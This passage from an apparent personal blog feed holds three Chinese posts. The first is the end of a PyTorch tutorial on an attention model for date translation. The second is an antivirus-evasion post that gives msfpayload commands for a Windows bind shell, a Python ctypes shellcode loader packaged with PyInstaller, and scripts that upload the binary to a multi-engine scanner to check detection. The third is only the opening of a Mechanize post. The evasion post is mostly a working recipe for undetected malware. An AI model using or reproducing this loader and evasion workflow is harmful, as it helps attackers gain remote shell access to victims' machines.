</span><span class="n">x</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">drop</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">embedding</span><span class="p">(</span><span class="n">x</span><span class="p">))</span>
</code></pre></div></div>
<p>再通过编码器，得到编码隐状态a。</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># a: [batch, n_sequence, hidden]
</span><span class="n">a</span><span class="p">,</span> <span class="n">_</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">encoder</span><span class="p">(</span><span class="n">x</span><span class="p">)</span>
</code></pre></div></div>
<p>接下来，要用for循环输出每一轮的结果了。在此之前，我们要准备一些中间变量：用于计算注意力的解码器上一轮状态prev_s，用于解码器输入的上一轮输出prev_y，输出张量y。另外，由于我们要在循环中手动调用decoder完成每一轮的计算，还需要保存decoder的所有中间变量tmp_states。</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># prev_s: [batch, n_squence=1, hidden]
# prev_y: [batch, n_squence=1, EMBEDDING_LENGTH]
# y: [batch, n_output, EMBEDDING_LENGTH]
</span><span class="n">prev_s</span> <span class="o">=</span> <span class="n">x</span><span class="p">.</span><span class="n">new_zeros</span><span class="p">(</span><span class="n">batch</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="bp">self</span><span class="p">.</span><span class="n">decoder_dim</span><span class="p">)</span>
<span class="n">prev_y</span> <span class="o">=</span> <span class="n">x</span><span class="p">.</span><span class="n">new_zeros</span><span class="p">(</span><span class="n">batch</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="n">EMBEDDING_LENGTH</span><span class="p">)</span>
<span class="n">y</span> <span class="o">=</span> <span class="n">x</span><span class="p">.</span><span class="n">new_empty</span><span class="p">(</span><span class="n">batch</span><span class="p">,</span> <span class="n">n_output</span><span class="p">,</span> <span class="n">EMBEDDING_LENGTH</span><span class="p">)</span>
<span class="n">tmp_states</span> <span class="o">=</span> <span class="bp">None</span>
</code></pre></div></div>
<p>在每一轮输出中，我们首先要获得当前的解码器对于每一个输入的注意力alpha。每一个alpha由解码器上一轮状态prev_s和编码器本轮状态决定（一个全连接层+softmax）。为了充分利用并行计算，我们可以把所有alpha的计算打包成batch，一步做完。</p>

<p><img src="pytorch_images/5.jpg" alt="image" /></p>

<p><em>注意，这里的全连接层+softmax和普通的全连接网络不太一样。这里全连接层的输出通道数是1，会对n组输入做n次计算，得到n个结果，再对n个结果做softmax。我们之所以能一次得到n个结果，是巧妙地把n放到了batch那一维。</em></p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">for</span> <span class="n">i_output</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">n_output</span><span class="p">):</span>
    <span class="c1"># repeat_s: [batch, n_squence, hidden]
</span>    <span class="n">repeat_s</span> <span class="o">=</span> <span class="n">prev_s</span><span class="p">.</span><span class="n">repeat</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="n">n_squence</span><span class="p">,</span> <span class="mi">1</span><span class="p">)</span>
    <span class="c1"># attention_input: [batch * n_sequence, hidden_s + hidden_a]
</span>    <span class="n">attention_input</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">cat</span><span class="p">((</span><span class="n">repeat_s</span><span class="p">,</span> <span class="n">a</span><span class="p">),</span>
                                <span class="mi">2</span><span class="p">).</span><span class="n">reshape</span><span class="p">(</span><span class="n">batch</span> <span class="o">*</span> <span class="n">n_squence</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span>
    <span class="c1"># x: [batch * n_sequence, 1]
</span>    <span class="n">x</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">attention_linear</span><span class="p">(</span><span class="n">attention_input</span><span class="p">)</span>
    <span class="c1"># x: [batch, n_sequence]
</span>    <span class="n">x</span> <span class="o">=</span> <span class="n">x</span><span class="p">.</span><span class="n">reshape</span><span class="p">(</span><span class="n">batch</span><span class="p">,</span> <span class="n">n_squence</span><span class="p">)</span>
    <span class="n">alpha</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">softmax</span><span class="p">(</span><span class="n">x</span><span class="p">)</span>
</code></pre></div></div>
<p>求出了注意力alpha后，就可以用它来算出注意力上下文c了。</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">c</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="nb">sum</span><span class="p">(</span><span class="n">a</span> <span class="o">*</span> <span class="n">alpha</span><span class="p">.</span><span class="n">reshape</span><span class="p">(</span><span class="n">batch</span><span class="p">,</span> <span class="n">n_squence</span><span class="p">,</span> <span class="mi">1</span><span class="p">),</span> <span class="mi">1</span><span class="p">)</span>
</code></pre></div></div>
<p>之后，我们把c和上一轮输出prev_y拼一下，作为解码器的输出。</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">c</span> <span class="o">=</span> <span class="n">c</span><span class="p">.</span><span class="n">unsqueeze</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="n">decoder_input</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">cat</span><span class="p">((</span><span class="n">prev_y</span><span class="p">,</span> <span class="n">c</span><span class="p">),</span> <span class="mi">2</span><span class="p">)</span>
</code></pre></div></div>
<p>再调用解码器即可。这里我利用PyTorch的机制偷了个懒。理论上解码器第一轮的状态应该是全零张量，我们应该初始化两个全零张量作为LSTM的初始状态。但是，在PyTorch里，如果调用RNN时不传入状态，就默认会使用全零状态。因此，在第一轮调用时，我们可以不去传状态参数。</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">if</span> <span class="n">tmp_states</span> <span class="ow">is</span> <span class="bp">None</span><span class="p">:</span>
    <span class="n">prev_s</span><span class="p">,</span> <span class="n">tmp_states</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">decoder</span><span class="p">(</span><span class="n">decoder_input</span><span class="p">)</span>
<span class="k">else</span><span class="p">:</span>
    <span class="n">prev_s</span><span class="p">,</span> <span class="n">tmp_states</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">decoder</span><span class="p">(</span><span class="n">decoder_input</span><span class="p">,</span> <span class="n">tmp_states</span><span class="p">)</span>
</code></pre></div></div>
<p>最后，用线性层算出这轮的输出，维护输出变量y。循环结束后，返回y。</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="n">prev_y</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">output_linear</span><span class="p">(</span><span class="n">prev_s</span><span class="p">)</span>
    <span class="n">y</span><span class="p">[:,</span> <span class="n">i_output</span><span class="p">]</span> <span class="o">=</span> <span class="n">prev_y</span><span class="p">.</span><span class="n">squeeze</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>

<span class="k">return</span> <span class="n">y</span>
</code></pre></div></div>
<p>训练、测试、推理
写完了最核心的注意力模型，剩下的代码就比较简单了。</p>

<p>首先，我们要准备一个Dataset类。这个类可以读取输入、输出字符串，并把它们转换成整形数组。字符和整形数字间的映射非常暴力，一个字符的序号就是该字符的ASCII码。这样写比较简洁，但由于很多字符是用不到的，会浪费一些计算性能。</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">stoi</span><span class="p">(</span><span class="nb">str</span><span class="p">):</span>
    <span class="k">return</span> <span class="n">torch</span><span class="p">.</span><span class="n">LongTensor</span><span class="p">([</span><span class="nb">ord</span><span class="p">(</span><span class="n">char</span><span class="p">)</span> <span class="k">for</span> <span class="n">char</span> <span class="ow">in</span> <span class="nb">str</span><span class="p">])</span>


<span class="k">def</span> <span class="nf">itos</span><span class="p">(</span><span class="n">arr</span><span class="p">):</span>
    <span class="k">return</span> <span class="s">''</span><span class="p">.</span><span class="n">join</span><span class="p">([</span><span class="nb">chr</span><span class="p">(</span><span class="n">x</span><span class="p">)</span> <span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="n">arr</span><span class="p">])</span>


<span class="k">class</span> <span class="nc">DateDataset</span><span class="p">(</span><span class="n">Dataset</span><span class="p">):</span>
    <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">lines</span><span class="p">):</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">lines</span> <span class="o">=</span> <span class="n">lines</span>

    <span class="k">def</span> <span class="nf">__len__</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
        <span class="k">return</span> <span class="nb">len</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">lines</span><span class="p">)</span>

    <span class="k">def</span> <span class="nf">__getitem__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">index</span><span class="p">):</span>
        <span class="n">line</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">lines</span><span class="p">[</span><span class="n">index</span><span class="p">]</span>

        <span class="k">return</span> <span class="n">stoi</span><span class="p">(</span><span class="n">line</span><span class="p">[</span><span class="mi">0</span><span class="p">]),</span> <span class="n">stoi</span><span class="p">(</span><span class="n">line</span><span class="p">[</span><span class="mi">1</span><span class="p">])</span>
</code></pre></div></div>
<p>准备好DataSet后，就可以生成DataLoader了。在序列任务中，各个样本的序列长度可能是不一致的。我们可以用PyTorch的pad_sequence对长度不足的样本进行0填充，使得一个batch里的所有样本都有着同样的序列长度。</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">get_dataloader</span><span class="p">(</span><span class="n">filename</span><span class="p">):</span>

    <span class="k">def</span> <span class="nf">collate_fn</span><span class="p">(</span><span class="n">batch</span><span class="p">):</span>
        <span class="n">x</span><span class="p">,</span> <span class="n">y</span> <span class="o">=</span> <span class="nb">zip</span><span class="p">(</span><span class="o">*</span><span class="n">batch</span><span class="p">)</span>
        <span class="n">x_pad</span> <span class="o">=</span> <span class="n">pad_sequence</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">batch_first</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span>
        <span class="n">y_pad</span> <span class="o">=</span> <span class="n">pad_sequence</span><span class="p">(</span><span class="n">y</span><span class="p">,</span> <span class="n">batch_first</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span>
        <span class="k">return</span> <span class="n">x_pad</span><span class="p">,</span> <span class="n">y_pad</span>

    <span class="n">lines</span> <span class="o">=</span> <span class="n">load_date_data</span><span class="p">(</span><span class="n">filename</span><span class="p">)</span>
    <span class="n">dataset</span> <span class="o">=</span> <span class="n">DateDataset</span><span class="p">(</span><span class="n">lines</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">DataLoader</span><span class="p">(</span><span class="n">dataset</span><span class="p">,</span> <span class="mi">32</span><span class="p">,</span> <span class="n">collate_fn</span><span class="o">=</span><span class="n">collate_fn</span><span class="p">)</span>
</code></pre></div></div>
<p>这里要稍微注意一下，pad_sequence默认会做0填充，0填充在我们的项目里是合理的。在我们定义的“词汇表”里，0对应的是ASCII里的0号字符，这个字符不会和其他字符起冲突。</p>

<p>做好一切准备工作后，可以开始训练模型了。训练模型的代码非常常规，定义好Adam优化器、交叉熵误差，跑完模型后reshape一下算出loss再反向传播即可。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>def main():
    device = 'cuda:0'
    train_dataloader = get_dataloader('dldemos/attention/train.txt')
    test_dataloader = get_dataloader('dldemos/attention/test.txt')

    model = AttentionModel().to(device)

    # train

    optimizer = torch.optim.Adam(model.parameters(), lr=0.001)
    citerion = torch.nn.CrossEntropyLoss()
    for epoch in range(20):

        loss_sum = 0
        dataset_len = len(train_dataloader.dataset)

        for x, y in train_dataloader:
            x = x.to(device)
            y = y.to(device)
            hat_y = model(x)
            n, Tx, _ = hat_y.shape
            hat_y = torch.reshape(hat_y, (n * Tx, -1))
            label_y = torch.reshape(y, (n * Tx, ))
            loss = citerion(hat_y, label_y)

            optimizer.zero_grad()
            loss.backward()
            torch.nn.utils.clip_grad_norm_(model.parameters(), 0.5)
            optimizer.step()

            loss_sum += loss * n

        print(f'Epoch {epoch}. loss: {loss_sum / dataset_len}')

    torch.save(model.state_dict(), 'dldemos/attention/model.pth')
</code></pre></div></div>
<p>训练完模型后，我们可以测试一下模型在测试集上的正确率。在日期翻译任务中，我们可以把“正确”定义为输出和真值一模一样。比如一条日期的真值是”2000-01-01”，模型的输出必须也是”2000-01-01”才能说这个输出是正确的。编写并行化计算正确率的代码稍有难度。</p>

<p>模型的输出hat_y表示各个字符的出现概率。我们先用<code class="language-plaintext highlighter-rouge">prediction = torch.argmax(hat_y, 2)</code>把序列里每个概率最大的字符作为模型预测的字符。现在，我们要用并行化编程判断每对序列（整形标签数组）predition[i]和y[i]是否相等（注意，predition和y是带了batch那个维度的）。这里，我们可以让predition[i]和y[i]做减法再求和。仅当这个和为0时，我们才能说predition[i]和y[i]完全相等。通过这样一种曲折的实现方法，我们可以并行地算出正确率。</p>

<p>也许有更方便的API可以完成这个逻辑判断，但去网上搜索这么复杂的一个需求太麻烦了，我偷了个懒。</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># test
</span><span class="n">model</span><span class="p">.</span><span class="n">load_state_dict</span><span class="p">(</span><span class="n">torch</span><span class="p">.</span><span class="n">load</span><span class="p">(</span><span class="s">'dldemos/attention/model.pth'</span><span class="p">))</span>

<span class="n">accuracy</span> <span class="o">=</span> <span class="mi">0</span>
<span class="n">dataset_len</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="n">test_dataloader</span><span class="p">.</span><span class="n">dataset</span><span class="p">)</span>

<span class="k">for</span> <span class="n">x</span><span class="p">,</span> <span class="n">y</span> <span class="ow">in</span> <span class="n">test_dataloader</span><span class="p">:</span>
    <span class="n">x</span> <span class="o">=</span> <span class="n">x</span><span class="p">.</span><span class="n">to</span><span class="p">(</span><span class="n">device</span><span class="p">)</span>
    <span class="n">y</span> <span class="o">=</span> <span class="n">y</span><span class="p">.</span><span class="n">to</span><span class="p">(</span><span class="n">device</span><span class="p">)</span>
    <span class="n">hat_y</span> <span class="o">=</span> <span class="n">model</span><span class="p">(</span><span class="n">x</span><span class="p">)</span>
    <span class="n">prediction</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">argmax</span><span class="p">(</span><span class="n">hat_y</span><span class="p">,</span> <span class="mi">2</span><span class="p">)</span>
    <span class="n">score</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">where</span><span class="p">(</span><span class="n">torch</span><span class="p">.</span><span class="nb">sum</span><span class="p">(</span><span class="n">prediction</span> <span class="o">-</span> <span class="n">y</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span>
    <span class="n">accuracy</span> <span class="o">+=</span> <span class="n">torch</span><span class="p">.</span><span class="nb">sum</span><span class="p">(</span><span class="n">score</span><span class="p">)</span>

<span class="k">print</span><span class="p">(</span><span class="sa">f</span><span class="s">'Accuracy: </span><span class="si">{</span><span class="n">accuracy</span> <span class="o">/</span> <span class="n">dataset_len</span><span class="si">}</span><span class="s">'</span><span class="p">)</span>
</code></pre></div></div>
<p>最后，我们也可以临时生成几个测试用例，输出模型的预测结果。</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># inference
</span><span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">5</span><span class="p">):</span>
    <span class="n">x</span><span class="p">,</span> <span class="n">y</span> <span class="o">=</span> <span class="n">generate_date</span><span class="p">()</span>
    <span class="n">origin_x</span> <span class="o">=</span> <span class="n">x</span>
    <span class="n">x</span> <span class="o">=</span> <span class="n">stoi</span><span class="p">(</span><span class="n">x</span><span class="p">).</span><span class="n">unsqueeze</span><span class="p">(</span><span class="mi">0</span><span class="p">).</span><span class="n">to</span><span class="p">(</span><span class="n">device</span><span class="p">)</span>
    <span class="n">hat_y</span> <span class="o">=</span> <span class="n">model</span><span class="p">(</span><span class="n">x</span><span class="p">)</span>
    <span class="n">hat_y</span> <span class="o">=</span> <span class="n">hat_y</span><span class="p">.</span><span class="n">squeeze</span><span class="p">(</span><span class="mi">0</span><span class="p">).</span><span class="n">argmax</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
    <span class="n">hat_y</span> <span class="o">=</span> <span class="n">itos</span><span class="p">(</span><span class="n">hat_y</span><span class="p">)</span>
    <span class="k">print</span><span class="p">(</span><span class="sa">f</span><span class="s">'input: </span><span class="si">{</span><span class="n">origin_x</span><span class="si">}</span><span class="s">, prediction: </span><span class="si">{</span><span class="n">hat_y</span><span class="si">}</span><span class="s">, gt: </span><span class="si">{</span><span class="n">y</span><span class="si">}</span><span class="s">'</span><span class="p">)</span>
</code></pre></div></div>
<p>训练20-30个epoch后，模型差不多就收敛了。我训练的模型在测试集上的正确率约有98%。下面是随机测试用例的推理结果，可以看出模型的判断确实很准确。</p>
<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>input: 4 November 1988, prediction: 1988-11-04, gt: 1988-11-04
input: Friday 26, March 2021, prediction: 2021-03-26, gt: 2021-03-26
input: Saturday 2, December 1989, prediction: 1989-12-02, gt: 1989-12-02
input: 15/10/1971, prediction: 1971-10-15, gt: 1971-10-15
input: Mon 9, Oct 1989, prediction: 1989-10-09, gt: 1989-10-09
</code></pre></div></div>
<h3 id="总结">总结</h3>
<p>在这篇文章中，我展示了一个用PyTorch编写的注意力模型，它用于完成日期翻译任务。在这个项目中，最重要的是注意力模型的编写。如今，注意力模型已经不是功能最强大的模型架构了。不过，通过动手实现这个模型，我们可以对注意力机制有着更深刻的认识，有助于理解那些更先进的模型。</p>]]></content><author><name>LI PENGBIN</name><email>cralpbin@gmail.com</email></author><category term="python" /><category term="pytorch" /><category term="attention" /><summary type="html"><![CDATA[PyTorch 注意力模型实现详解（以简单的机器翻译为例） Transformer中的“注意力”最早来自于NLP里的注意力模型。通过动手实现一遍注意力模型，我们能够更深刻地理解注意力的原理，以便于学习Transformer等后续那些基于注意力的模型。在这篇文章中，我将分享如何用PyTorch的基本API实现注意力模型，完成一个简单的机器翻译项目——把各种格式的日期“翻译”成统一格式的日期。]]></summary></entry><entry><title type="html">Using Python to implement anti-killing</title><link href="https://crabin.github.io/posts/2024/12/Using%20Python%20to%20implement%20anti-killing/" rel="alternate" type="text/html" title="Using Python to implement anti-killing" /><published>2024-12-23T00:00:00+00:00</published><updated>2024-12-23T00:00:00+00:00</updated><id>https://crabin.github.io/posts/2024/12/Using%20Python%20to%20implement%20anti-killing</id><content type="html" xml:base="https://crabin.github.io/posts/2024/12/Using%20Python%20to%20implement%20anti-killing/"><![CDATA[<h2 id="用-python-实现免杀">用 Python 实现免杀</h2>

<p>被命名为“火焰”（Flame）的恶意软件，在用被称为 Beetlejuice、Microbe、Frog、Snack 和 Gator 的 Lua 脚本编译后，该恶意软件可以通过蓝牙标识出被其侵入的计算机、秘密录音，入侵附近的计算机并往远程命令和控制服务器上传屏幕截图和数据。大多数杀毒引擎仍在使用基于特征码的检测作为主要的检测手段。</p>

<h2 id="免杀的过程">免杀的过程</h2>

<p>在 Metasploit 框架中包含有一个恶意代码库。使用 Metasploit 生成 C 语言风格的一些 shellcode 作为恶意载荷。</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># msfpayload windows/shell_bind_tcp LPORT=1337 C</span>
</code></pre></div></div>

<p>要写一段用来执行这段 C 语言风格的 shellcode 脚本。Python 支持导入其他语言的函数库，导入 ctypes 库——这个库使我们能用 C 语言中的数据类型。</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">ctypes</span> <span class="kn">import</span> <span class="o">*</span>
<span class="n">shellcode</span> <span class="o">=</span> <span class="p">(</span><span class="s">"..."</span><span class="p">)</span>
<span class="n">memory_with_shell</span> <span class="o">=</span> <span class="n">create_string_buffer</span><span class="p">(</span><span class="n">shellcode</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">shellcode</span><span class="p">))</span>
<span class="n">shell</span> <span class="o">=</span> <span class="n">cast</span><span class="p">(</span><span class="n">memory_with_shell</span><span class="p">,</span> <span class="n">CFUNCTYPE</span><span class="p">(</span><span class="n">c_void_p</span><span class="p">))</span>
<span class="n">shell</span><span class="p">()</span>
</code></pre></div></div>

<p>下一步，使用 Pyinstaller 生成 Windows PE（portable executable）格式的可执行文件。</p>

<h3 id="免杀验证">免杀验证</h3>

<p>使用 <code class="language-plaintext highlighter-rouge">vscan.novirusthanks.org</code> 的服务来扫描可执行文件。NoVirusThanks 提供了一个 Web 网页界面，可以上传可疑文件，然后用多种不同的杀毒引擎扫描它。可以编写一个小巧的 Python 脚本自动完成这一步骤。在通过 Web 网页界面交互时，抓取一个 tcpdump 抓包文件，利用 httplib 库进行编写。</p>

<p>注意 boundary 字段，是用来分隔文件内容和数据包中其他内容的</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">upload_file</span><span class="p">(</span><span class="n">file_name</span><span class="p">):</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"[+] Uploading file to NoVirusThanks..."</span><span class="p">)</span>
    <span class="n">file_contents</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="n">file_name</span><span class="p">,</span> <span class="s">"rb"</span><span class="p">).</span><span class="n">read</span><span class="p">()</span>
    <span class="n">header</span> <span class="o">=</span> <span class="p">{</span>
      <span class="s">"Content-Type"</span><span class="p">:</span> <span class="s">"multipart/form-data; boundary=----WebKitFormBoundaryF17rwCZdGuPNPT9U"</span>
    <span class="p">}</span>
    <span class="n">params</span> <span class="o">=</span> <span class="s">"----WebKitFormBoundaryF17rwCZdGuPNPT9U"</span>
    <span class="n">params</span> <span class="o">+=</span> <span class="s">'</span><span class="se">\r\n</span><span class="s">Content-Disposition: form-data; name="upfile"; filename="{}"'</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">file_name</span><span class="p">)</span>
    <span class="n">params</span> <span class="o">+=</span> <span class="s">'</span><span class="se">\r\n</span><span class="s">Content-Type: application/octet stream</span><span class="se">\r\n\r\n</span><span class="s">'</span>
    <span class="n">params</span> <span class="o">+=</span> <span class="n">file_contents</span>
    <span class="n">params</span> <span class="o">+=</span> <span class="s">'</span><span class="se">\r\n</span><span class="s">------WebKitFormBoundaryF17rwCZdGuPNPT9U'</span>
    <span class="n">params</span> <span class="o">+=</span> <span class="s">'</span><span class="se">\r\n</span><span class="s">Content-Disposition: form-data; name="submitfile"</span><span class="se">\r\n</span><span class="s">'</span>
    <span class="n">params</span> <span class="o">+=</span> <span class="s">"------WebKitFormBoundaryF17rwCZdGuPNPT9U--</span><span class="se">\r\n</span><span class="s">"</span>
    <span class="n">conn</span> <span class="o">=</span> <span class="n">httplib</span><span class="p">.</span><span class="n">HTTPConnection</span><span class="p">(</span><span class="s">"vscan.novirusthanks.org"</span><span class="p">)</span>
    <span class="n">conn</span><span class="p">.</span><span class="n">request</span><span class="p">(</span><span class="s">"POST"</span><span class="p">,</span> <span class="s">"/"</span><span class="p">,</span> <span class="n">params</span><span class="p">,</span> <span class="n">header</span><span class="p">)</span>
    <span class="n">response</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="n">getresponse</span><span class="p">()</span>
    <span class="n">location</span> <span class="o">=</span> <span class="n">response</span><span class="p">.</span><span class="n">getheader</span><span class="p">(</span><span class="s">"location"</span><span class="p">)</span>
    <span class="n">conn</span><span class="p">.</span><span class="n">close</span><span class="p">()</span>
    <span class="k">return</span> <span class="n">location</span>
</code></pre></div></div>

<p>接下来写一个把我们上传的可疑文件的扫描结果打印出来的 Python 脚本。首先，脚本要连接到 “file” 页面，它会返回一个 “正在进行扫描” 的消息。一旦这个页面返回一个 HTTP 302，就重定向到分析结果页面，可以使用一个正则表达式读取发现率，并把 CSS 代码用空白字符串替换掉。</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">print_results</span><span class="p">(</span><span class="n">url</span><span class="p">):</span>
    <span class="n">status</span> <span class="o">=</span> <span class="mi">200</span>
    <span class="n">host</span> <span class="o">=</span> <span class="n">url_parse</span><span class="p">(</span><span class="n">url</span><span class="p">)[</span><span class="mi">1</span><span class="p">]</span>
    <span class="n">path</span> <span class="o">=</span> <span class="n">url_parse</span><span class="p">(</span><span class="n">url</span><span class="p">)[</span><span class="mi">2</span><span class="p">]</span>
    <span class="k">if</span> <span class="s">"analysis"</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">path</span><span class="p">:</span>
        <span class="k">while</span> <span class="n">status</span> <span class="o">!=</span> <span class="mi">302</span><span class="p">:</span>
            <span class="n">conn</span> <span class="o">=</span> <span class="n">httplib</span><span class="p">.</span><span class="n">HTTPConnection</span><span class="p">(</span><span class="n">host</span><span class="p">)</span>
            <span class="n">conn</span><span class="p">.</span><span class="n">request</span><span class="p">(</span><span class="s">"GET"</span><span class="p">,</span> <span class="n">path</span><span class="p">)</span>
            <span class="n">resp</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="n">getresponse</span><span class="p">()</span>
            <span class="n">status</span> <span class="o">=</span> <span class="n">resp</span><span class="p">.</span><span class="n">status</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[+] Scanning file..."</span><span class="p">)</span>
            <span class="n">conn</span><span class="p">.</span><span class="n">close</span><span class="p">()</span>
            <span class="n">time</span><span class="p">.</span><span class="n">sleep</span><span class="p">(</span><span class="mi">15</span><span class="p">)</span>
	<span class="k">print</span><span class="p">(</span><span class="s">"[+] Scan Complete."</span><span class="p">)</span>
    <span class="n">path</span> <span class="o">=</span> <span class="n">path</span><span class="p">.</span><span class="n">replace</span><span class="p">(</span><span class="s">"file"</span><span class="p">,</span> <span class="s">"analysis"</span><span class="p">)</span>
    <span class="n">conn</span> <span class="o">=</span> <span class="n">httplib</span><span class="p">.</span><span class="n">HTTPConnection</span><span class="p">(</span><span class="n">host</span><span class="p">)</span>
    <span class="n">conn</span><span class="p">.</span><span class="n">request</span><span class="p">(</span><span class="s">"GET"</span><span class="p">,</span> <span class="n">path</span><span class="p">)</span>
    <span class="n">resp</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="n">getresponse</span><span class="p">()</span>
    <span class="n">data</span> <span class="o">=</span> <span class="n">resp</span><span class="p">.</span><span class="n">read</span><span class="p">()</span>
    <span class="n">conn</span><span class="p">.</span><span class="n">close</span><span class="p">()</span>
    <span class="n">re_results</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">findall</span><span class="p">(</span><span class="sa">r</span><span class="s">"Detection rate:.*\) "</span><span class="p">,</span> <span class="n">data</span><span class="p">)</span>
    <span class="n">html_strip_res</span> <span class="o">=</span> <span class="n">re_results</span><span class="p">[</span><span class="mi">1</span><span class="p">].</span><span class="n">replace</span><span class="p">(</span><span class="s">"&amp;lt;font color='red'&amp;gt;"</span><span class="p">,</span> <span class="s">''</span><span class="p">).</span><span class="n">replace</span><span class="p">(</span><span class="s">"&amp;lt;/font&amp;gt;"</span><span class="p">,</span> <span class="s">""</span><span class="p">)</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"[+] {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">html_strip_res</span><span class="p">))</span>
</code></pre></div></div>

<p>使用默认的 Metasploit 编码器把它编码到一个标准的 Windows 可执行文件中。这个文件显然无法逃过正常的杀毒软件的查杀</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>msfpayload windows/shell_bind_tcp <span class="nv">LPORT</span><span class="o">=</span>1337 X <span class="o">&gt;</span> bindshell.exe
</code></pre></div></div>]]></content><author><name>LI PENGBIN</name><email>cralpbin@gmail.com</email></author><category term="python" /><category term="cybersecurity" /><summary type="html"><![CDATA[用 Python 实现免杀]]></summary></entry><entry><title type="html">Probing the Network with Python</title><link href="https://crabin.github.io/posts/2024/11/Probing%20the%20Network%20with%20Python/" rel="alternate" type="text/html" title="Probing the Network with Python" /><published>2024-11-17T00:00:00+00:00</published><updated>2024-11-17T00:00:00+00:00</updated><id>https://crabin.github.io/posts/2024/11/Probing%20the%20Network%20with%20Python</id><content type="html" xml:base="https://crabin.github.io/posts/2024/11/Probing%20the%20Network%20with%20Python/"><![CDATA[<h2 id="用-python-刺探网络">用 Python 刺探网络</h2>

<h2 id="使用-mechanize-库上网">使用 Mechanize 库上网</h2>

<p>Mechanize 中的主要类（Browser）允许我们对浏览器中的任何内容进行操作。</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">mechanize</span>
<span class="k">def</span> <span class="nf">view_page</span><span class="p">(</span><span class="n">url</span><span class="p">):</span>
    <span class="n">browser</span> <span class="o">=</span> <span class="n">mechanize</span><span class="p">.</span><span class="n">Browser</span><span class="p">()</span>
    <span class="n">page</span> <span class="o">=</span> <span class="n">browser</span><span class="p">.</span><span class="nb">open</span><span class="p">(</span><span class="n">url</span><span class="p">)</span>
